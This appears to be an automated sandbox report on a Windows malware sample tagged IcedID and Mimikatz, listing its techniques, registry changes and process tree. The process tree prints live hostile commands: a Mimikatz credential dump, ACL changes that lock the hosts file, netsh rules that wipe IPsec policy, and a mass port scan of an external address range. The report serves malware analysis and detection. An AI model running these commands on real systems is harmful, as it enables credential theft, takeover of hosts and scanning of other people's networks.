Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wpcap.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	zyejeil.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	xohudmc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2024-12-31_d8bee6085865b2280551d3db5138aca0_hacktools_icedid_mimikatz.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
4868	cmd.exe
4852	PING.EXE

NSIS installer 3 IoCs

installer

resource	yara_rule
behavioral2/files/0x0008000000023c85-7.dat	nsis_installer_2
behavioral2/files/0x0007000000023c95-15.dat	nsis_installer_1
behavioral2/files/0x0007000000023c95-15.dat	nsis_installer_2

Modifies data under HKEY_USERS 45 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	ucqzmelym.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	ucqzmelym.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	ucqzmelym.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	ucqzmelym.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	ucqzmelym.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals	ucqzmelym.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	ucqzmelym.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	ucqzmelym.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	zyejeil.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	zyejeil.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	ucqzmelym.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	ucqzmelym.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	ucqzmelym.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	ucqzmelym.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	ucqzmelym.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	ucqzmelym.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	ucqzmelym.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	zyejeil.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	ucqzmelym.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	ucqzmelym.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	ucqzmelym.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	ucqzmelym.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	ucqzmelym.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	ucqzmelym.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	ucqzmelym.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	ucqzmelym.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	zyejeil.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	ucqzmelym.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	ucqzmelym.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	ucqzmelym.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	ucqzmelym.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	ucqzmelym.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	ucqzmelym.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	zyejeil.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	ucqzmelym.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	ucqzmelym.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	ucqzmelym.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	ucqzmelym.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	ucqzmelym.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	ucqzmelym.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	ucqzmelym.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	zyejeil.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	ucqzmelym.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	ucqzmelym.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	ucqzmelym.exe

Modifies registry class 14 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.bat\	zyejeil.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile"	zyejeil.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.reg\	zyejeil.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile"	zyejeil.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\	zyejeil.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile"	zyejeil.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile"	zyejeil.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile"	zyejeil.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\	zyejeil.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile"	zyejeil.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile"	zyejeil.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.js\	zyejeil.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\	zyejeil.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\	zyejeil.exe

Runs net.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
4852	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
3156	schtasks.exe
756	schtasks.exe
1552	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1608	zyejeil.exe
1608	zyejeil.exe
1608	zyejeil.exe
1608	zyejeil.exe
1608	zyejeil.exe
1608	zyejeil.exe
1608	zyejeil.exe
1608	zyejeil.exe
1608	zyejeil.exe
1608	zyejeil.exe
1608	zyejeil.exe
1608	zyejeil.exe
1608	zyejeil.exe
1608	zyejeil.exe
1608	zyejeil.exe
1608	zyejeil.exe
1608	zyejeil.exe
1608	zyejeil.exe
1608	zyejeil.exe
1608	zyejeil.exe
1608	zyejeil.exe
1608	zyejeil.exe
1608	zyejeil.exe
1608	zyejeil.exe
1608	zyejeil.exe
1608	zyejeil.exe
1608	zyejeil.exe
1608	zyejeil.exe
1608	zyejeil.exe
1608	zyejeil.exe
1608	zyejeil.exe
1608	zyejeil.exe
1608	zyejeil.exe
1608	zyejeil.exe
1608	zyejeil.exe
1608	zyejeil.exe
1608	zyejeil.exe
1608	zyejeil.exe
1608	zyejeil.exe
1608	zyejeil.exe
1608	zyejeil.exe
1608	zyejeil.exe
1608	zyejeil.exe
1608	zyejeil.exe
1608	zyejeil.exe
1608	zyejeil.exe
1608	zyejeil.exe
1608	zyejeil.exe
1608	zyejeil.exe
1608	zyejeil.exe
1608	zyejeil.exe
1608	zyejeil.exe
1608	zyejeil.exe
1608	zyejeil.exe
1608	zyejeil.exe
1608	zyejeil.exe
1608	zyejeil.exe
1608	zyejeil.exe
1608	zyejeil.exe
1608	zyejeil.exe
1608	zyejeil.exe
1608	zyejeil.exe
1608	zyejeil.exe
1608	zyejeil.exe

Suspicious behavior: LoadsDriver 15 IoCs

pid	Process
652	Process not Found
652	Process not Found
652	Process not Found
652	Process not Found
652	Process not Found
652	Process not Found
652	Process not Found
652	Process not Found
652	Process not Found
652	Process not Found
652	Process not Found
652	Process not Found
652	Process not Found
652	Process not Found
652	Process not Found

Suspicious behavior: RenamesItself 1 IoCs

pid	Process
1172	2024-12-31_d8bee6085865b2280551d3db5138aca0_hacktools_icedid_mimikatz.exe

Suspicious use of AdjustPrivilegeToken 24 IoCs

description	pid	Process
Token: SeDebugPrivilege	1172	2024-12-31_d8bee6085865b2280551d3db5138aca0_hacktools_icedid_mimikatz.exe
Token: SeDebugPrivilege	3656	zyejeil.exe
Token: SeDebugPrivilege	1608	zyejeil.exe
Token: SeDebugPrivilege	4280	vfshost.exe
Token: SeDebugPrivilege	3252	ucqzmelym.exe
Token: SeLockMemoryPrivilege	524	ejzklm.exe
Token: SeLockMemoryPrivilege	524	ejzklm.exe
Token: SeDebugPrivilege	2024	ucqzmelym.exe
Token: SeDebugPrivilege	4868	ucqzmelym.exe
Token: SeDebugPrivilege	452	ucqzmelym.exe
Token: SeDebugPrivilege	1984	ucqzmelym.exe
Token: SeDebugPrivilege	4488	ucqzmelym.exe
Token: SeDebugPrivilege	1820	ucqzmelym.exe
Token: SeDebugPrivilege	2480	ucqzmelym.exe
Token: SeDebugPrivilege	4340	ucqzmelym.exe
Token: SeDebugPrivilege	4708	ucqzmelym.exe
Token: SeDebugPrivilege	4468	ucqzmelym.exe
Token: SeDebugPrivilege	1048	ucqzmelym.exe
Token: SeDebugPrivilege	4400	ucqzmelym.exe
Token: SeDebugPrivilege	2152	ucqzmelym.exe
Token: SeDebugPrivilege	4024	ucqzmelym.exe
Token: SeDebugPrivilege	1916	ucqzmelym.exe
Token: SeDebugPrivilege	1568	ucqzmelym.exe
Token: SeDebugPrivilege	5000	ucqzmelym.exe

Suspicious use of SetWindowsHookEx 12 IoCs

pid	Process
1172	2024-12-31_d8bee6085865b2280551d3db5138aca0_hacktools_icedid_mimikatz.exe
1172	2024-12-31_d8bee6085865b2280551d3db5138aca0_hacktools_icedid_mimikatz.exe
3656	zyejeil.exe
3656	zyejeil.exe
1608	zyejeil.exe
1608	zyejeil.exe
2908	xohudmc.exe
4208	cusoqc.exe
3000	zyejeil.exe
3000	zyejeil.exe
2372	zyejeil.exe
2372	zyejeil.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1172 wrote to memory of 4868	1172	2024-12-31_d8bee6085865b2280551d3db5138aca0_hacktools_icedid_mimikatz.exe	83
PID 1172 wrote to memory of 4868	1172	2024-12-31_d8bee6085865b2280551d3db5138aca0_hacktools_icedid_mimikatz.exe	83
PID 1172 wrote to memory of 4868	1172	2024-12-31_d8bee6085865b2280551d3db5138aca0_hacktools_icedid_mimikatz.exe	83
PID 4868 wrote to memory of 4852	4868	cmd.exe	85
PID 4868 wrote to memory of 4852	4868	cmd.exe	85
PID 4868 wrote to memory of 4852	4868	cmd.exe	85
PID 4868 wrote to memory of 3656	4868	cmd.exe	87
PID 4868 wrote to memory of 3656	4868	cmd.exe	87
PID 4868 wrote to memory of 3656	4868	cmd.exe	87
PID 1608 wrote to memory of 1748	1608	zyejeil.exe	89
PID 1608 wrote to memory of 1748	1608	zyejeil.exe	89
PID 1608 wrote to memory of 1748	1608	zyejeil.exe	89
PID 1748 wrote to memory of 4432	1748	cmd.exe	91
PID 1748 wrote to memory of 4432	1748	cmd.exe	91
PID 1748 wrote to memory of 4432	1748	cmd.exe	91
PID 1748 wrote to memory of 4024	1748	cmd.exe	92
PID 1748 wrote to memory of 4024	1748	cmd.exe	92
PID 1748 wrote to memory of 4024	1748	cmd.exe	92
PID 1748 wrote to memory of 3736	1748	cmd.exe	93
PID 1748 wrote to memory of 3736	1748	cmd.exe	93
PID 1748 wrote to memory of 3736	1748	cmd.exe	93
PID 1748 wrote to memory of 5024	1748	cmd.exe	94
PID 1748 wrote to memory of 5024	1748	cmd.exe	94
PID 1748 wrote to memory of 5024	1748	cmd.exe	94
PID 1748 wrote to memory of 2268	1748	cmd.exe	95
PID 1748 wrote to memory of 2268	1748	cmd.exe	95
PID 1748 wrote to memory of 2268	1748	cmd.exe	95
PID 1748 wrote to memory of 4936	1748	cmd.exe	96
PID 1748 wrote to memory of 4936	1748	cmd.exe	96
PID 1748 wrote to memory of 4936	1748	cmd.exe	96
PID 1608 wrote to memory of 4784	1608	zyejeil.exe	98
PID 1608 wrote to memory of 4784	1608	zyejeil.exe	98
PID 1608 wrote to memory of 4784	1608	zyejeil.exe	98
PID 1608 wrote to memory of 3296	1608	zyejeil.exe	100
PID 1608 wrote to memory of 3296	1608	zyejeil.exe	100
PID 1608 wrote to memory of 3296	1608	zyejeil.exe	100
PID 1608 wrote to memory of 1228	1608	zyejeil.exe	102
PID 1608 wrote to memory of 1228	1608	zyejeil.exe	102
PID 1608 wrote to memory of 1228	1608	zyejeil.exe	102
PID 1608 wrote to memory of 876	1608	zyejeil.exe	115
PID 1608 wrote to memory of 876	1608	zyejeil.exe	115
PID 1608 wrote to memory of 876	1608	zyejeil.exe	115
PID 876 wrote to memory of 2620	876	cmd.exe	117
PID 876 wrote to memory of 2620	876	cmd.exe	117
PID 876 wrote to memory of 2620	876	cmd.exe	117
PID 2620 wrote to memory of 4312	2620	wpcap.exe	118
PID 2620 wrote to memory of 4312	2620	wpcap.exe	118
PID 2620 wrote to memory of 4312	2620	wpcap.exe	118
PID 4312 wrote to memory of 4512	4312	net.exe	120
PID 4312 wrote to memory of 4512	4312	net.exe	120
PID 4312 wrote to memory of 4512	4312	net.exe	120
PID 2620 wrote to memory of 2036	2620	wpcap.exe	121
PID 2620 wrote to memory of 2036	2620	wpcap.exe	121
PID 2620 wrote to memory of 2036	2620	wpcap.exe	121
PID 2036 wrote to memory of 4040	2036	net.exe	123
PID 2036 wrote to memory of 4040	2036	net.exe	123
PID 2036 wrote to memory of 4040	2036	net.exe	123
PID 2620 wrote to memory of 5016	2620	wpcap.exe	124
PID 2620 wrote to memory of 5016	2620	wpcap.exe	124
PID 2620 wrote to memory of 5016	2620	wpcap.exe	124
PID 5016 wrote to memory of 3748	5016	net.exe	126
PID 5016 wrote to memory of 3748	5016	net.exe	126
PID 5016 wrote to memory of 3748	5016	net.exe	126
PID 2620 wrote to memory of 2276	2620	wpcap.exe	127

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2132
- C:\Windows\TEMP\stjqapuut\ejzklm.exe
  "C:\Windows\TEMP\stjqapuut\ejzklm.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:524

C:\Users\Admin\AppData\Local\Temp\2024-12-31_d8bee6085865b2280551d3db5138aca0_hacktools_icedid_mimikatz.exe
"C:\Users\Admin\AppData\Local\Temp\2024-12-31_d8bee6085865b2280551d3db5138aca0_hacktools_icedid_mimikatz.exe"
1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1172
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\uzepkltb\zyejeil.exe
  2⤵
  - System Location Discovery: System Language Discovery
  - System Network Configuration Discovery: Internet Connection Discovery
  - Suspicious use of WriteProcessMemory
  PID:4868
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1 -n 5
    3⤵
    - System Location Discovery: System Language Discovery
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:4852
- - C:\Windows\uzepkltb\zyejeil.exe
    C:\Windows\uzepkltb\zyejeil.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    PID:3656

C:\Windows\uzepkltb\zyejeil.exe
C:\Windows\uzepkltb\zyejeil.exe
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1608
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1748
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4432
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D users
    3⤵
    PID:4024
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3736
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
    3⤵
    PID:5024
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2268
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4936
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static del all
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:4784
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add policy name=Bastards description=FuckingBastards
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:3296
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filteraction name=BastardsList action=block
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:1228
- C:\Windows\SysWOW64\cmd.exe
  cmd /c C:\Windows\lrcwzntnt\bmkbibntg\wpcap.exe /S
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:876
- - C:\Windows\lrcwzntnt\bmkbibntg\wpcap.exe
    C:\Windows\lrcwzntnt\bmkbibntg\wpcap.exe /S
    3⤵
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Loads dropped DLL
    - Drops file in System32 directory
    - Drops file in Program Files directory
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2620
  - - C:\Windows\SysWOW64\net.exe
      net stop "Boundary Meter"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:4312
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "Boundary Meter"
        5⤵
        
        PID:4512
  - - C:\Windows\SysWOW64\net.exe
      net stop "TrueSight Meter"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2036
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "TrueSight Meter"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4040
  - - C:\Windows\SysWOW64\net.exe
      net stop npf
      4⤵
      Suspicious use of WriteProcessMemory
      PID:5016
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop npf
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3748
  - - C:\Windows\SysWOW64\net.exe
      net start npf
      4⤵
      System Location Discovery: System Language Discovery
      PID:2276
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 start npf
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2288
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net start npf
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4724
- - C:\Windows\SysWOW64\net.exe
    net start npf
    3⤵
    PID:2040
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 start npf
      4⤵
      System Location Discovery: System Language Discovery
      PID:2712
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net start npf
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2152
- - C:\Windows\SysWOW64\net.exe
    net start npf
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4456
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 start npf
      4⤵
      PID:5052
- C:\Windows\SysWOW64\cmd.exe
  cmd /c C:\Windows\lrcwzntnt\bmkbibntg\zqkkhilub.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\lrcwzntnt\bmkbibntg\Scant.txt
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1984
- - C:\Windows\lrcwzntnt\bmkbibntg\zqkkhilub.exe
    C:\Windows\lrcwzntnt\bmkbibntg\zqkkhilub.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\lrcwzntnt\bmkbibntg\Scant.txt
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:5112
- C:\Windows\SysWOW64\cmd.exe
  cmd /c C:\Windows\lrcwzntnt\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\lrcwzntnt\Corporate\log.txt
  2⤵
  - Drops file in Windows directory
  PID:4892
- - C:\Windows\lrcwzntnt\Corporate\vfshost.exe
    C:\Windows\lrcwzntnt\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:4280
- C:\Windows\SysWOW64\cmd.exe
